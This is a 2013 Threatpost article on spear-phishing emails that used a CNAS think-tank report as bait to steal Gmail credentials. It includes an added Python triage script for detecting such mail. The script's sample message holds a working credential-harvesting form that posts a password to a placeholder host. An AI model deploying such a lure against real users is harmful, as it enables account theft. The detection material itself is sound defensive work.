Obama-Favored Think Tank Used as Bait in Spear Phishing Attacks

ID THREATPOST:AA2AE1166617EAB7C7F1F66788A56520
Type threatpost
Reporter Paul Roberts
Modified 2013-04-17T16:34:00


Spear phishing attacks against U.S. government officials, politicians and public policy wonks are using a D.C. think tank favored by the Obama Administration as bait, according to a report from researcher Mila Parkour.

A new report from virus researcher Mila Parkour on the blog Contagio says that targeted attacks are using correspondence from The Center for a New American Security (CNAS), a Washington, D.C. think tank favored by the Obama administration, as bait in so-called spear phishing attacks.

The attacks are aimed at collecting log-in credentials for Google Gmail accounts used by high-level political and military figures, as well as policymakers in target countries. They are a continuation of an extended spear phishing campaign against targets in the U.S., Europe and Asia that prompted a warning from Google in June. Despite those warnings, the latest e-mail suggests that the attacks – believed to be based in China – continue to target the government and political establishment, Parkour writes.

CNAS has already sent two employees to key jobs within the Obama administration: founders Michèle Flournoy and Kurt Campbell serve as the Undersecretary of Defense for Policy and the Assistant Secretary of State for East Asian and Pacific Affairs, respectively.

Parkour reported that e-mail messages with a subject line referring to the recent report “CNAS Report Calls Declining Satellite Capabilities National Security Concern” were sent to Gmail accounts belonging to “a person associated with political and international affairs.” The messages appear to come from a trusted contact and contain a subscription form that asks for the recipient's Gmail credentials in order to subscribe. Those credentials are harvested and deposited on one of a series of compromised servers, many located within the U.S., and the user is then redirected back to Gmail. Subsequently, the account is monitored by unknown parties using the harvested credentials.

A test account Parkour “registered” with the attackers was accessed a mere two hours after the credentials were harvested. The attackers logged in to the account over Tor (The Onion Router), so it is unclear where they accessed it from. However, other aspects of the spear phishing attack bear the telltale signatures of a China-based operation, including the source IP of the phishing e-mail, which traces back to Taiwan, and the attackers' use of Foxmail to create and send the phishing e-mail, a common trait of China-based spear phishing attacks.
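The indicators described above, a "subscription" form that collects a Gmail password and posts it somewhere other than Google, a Foxmail client fingerprint in the headers, and the originating IP in the Received chain, are the kind of thing a mail-triage script can pull out of a suspicious message. The following is an added example written for this page, not tooling from Parkour, Contagio or Google. It runs over a constructed sample message modelled on the lure the article describes; the hostnames, IP addresses (203.0.113.0/24 is a documentation range), message IDs and the X-Mailer string are invented for the example and are not indicators from the real campaign.

```python
import email
import ipaddress
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hops from these ranges are our own relays and are skipped when looking for
# the sender's originating IP. Listed explicitly rather than via
# ipaddress.is_private, which would also hide the documentation range used
# in the constructed sample below.
_INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]
_IPV4_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")

# Where a Gmail credential form is allowed to post. Anything else is a harvester.
GOOGLE_LOGIN_HOSTS = ("accounts.google.com", "www.google.com")

# Constructed sample: a subscription lure that posts Gmail credentials off-site.
# Every host, address and header value here is invented for the example.
SAMPLE_PHISH = b"""Received: from relay.example.com (relay.example.com [10.0.0.5])
        by mx.example.com with ESMTP id 4Abc123
        for <target@gmail.com>; Tue, 14 Jun 2011 09:15:02 -0400
Received: from [203.0.113.45] (unknown [203.0.113.45])
        by relay.example.com with ESMTP; Tue, 14 Jun 2011 09:14:58 -0400
From: "Trusted Contact" <contact@example.net>
To: target@gmail.com
Subject: CNAS Report Calls Declining Satellite Capabilities National Security Concern
X-Mailer: Foxmail 6, 15, 201, 22
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Subscribe to receive the full report:</p>
<form method="post" action="http://subscribe.example.org/login.php">
Gmail address: <input type="text" name="email"><br>
Password: <input type="password" name="passwd"><br>
<input type="submit" value="Subscribe">
</form>
</body></html>
"""


class _FormScanner(HTMLParser):
    """Collects every <form> and whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def credential_harvest_forms(html, trusted_hosts=GOOGLE_LOGIN_HOSTS):
    """Return action URLs of password-collecting forms that post outside trusted_hosts."""
    scanner = _FormScanner()
    scanner.feed(html)
    scanner.close()
    hits = []
    for form in scanner.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        if form["password"] and host not in trusted_hosts:
            hits.append(form["action"])
    return hits


def originating_ip(msg):
    """Earliest non-internal IP in the Received chain (bottom header = first hop)."""
    for received in reversed(msg.get_all("Received", [])):
        for candidate in _IPV4_RE.findall(str(received)):
            try:
                addr = ipaddress.ip_address(candidate)
            except ValueError:
                continue
            if not any(addr in net for net in _INTERNAL_NETS):
                return str(addr)
    return None


def triage(raw_message, trusted_hosts=GOOGLE_LOGIN_HOSTS):
    """Parse a raw RFC 822 message and report the indicators discussed in the article."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    body = msg.get_body(preferencelist=("html", "plain"))
    html = body.get_content() if body is not None else ""
    x_mailer = str(msg.get("X-Mailer", ""))
    report = {
        "originating_ip": originating_ip(msg),
        "x_mailer": x_mailer,
        "harvest_forms": credential_harvest_forms(html, trusted_hosts),
        "flags": [],
    }
    if "foxmail" in x_mailer.lower():
        report["flags"].append("foxmail-client")
    if report["harvest_forms"]:
        report["flags"].append("offsite-credential-form")
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PHISH).items():
        print(f"{key}: {value}")
```

Two caveats apply when using output like this. The X-Mailer header and every Received line below your own first trusted relay are written by the sender and are trivially forged, so they are pivots for hunting related messages rather than proof of origin. And, as the article notes, the subsequent logins to the harvested account came over Tor, so the login source tells you nothing; the mail headers and the harvesting host are the only attributable pieces.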

Parkour said she has informed Google about the latest round of spear phishing e-mails, but that the company is limited in how it can respond to stop them.

Users who are concerned about account safety should use two-factor authentication and frequently change out account passwords, she recommends.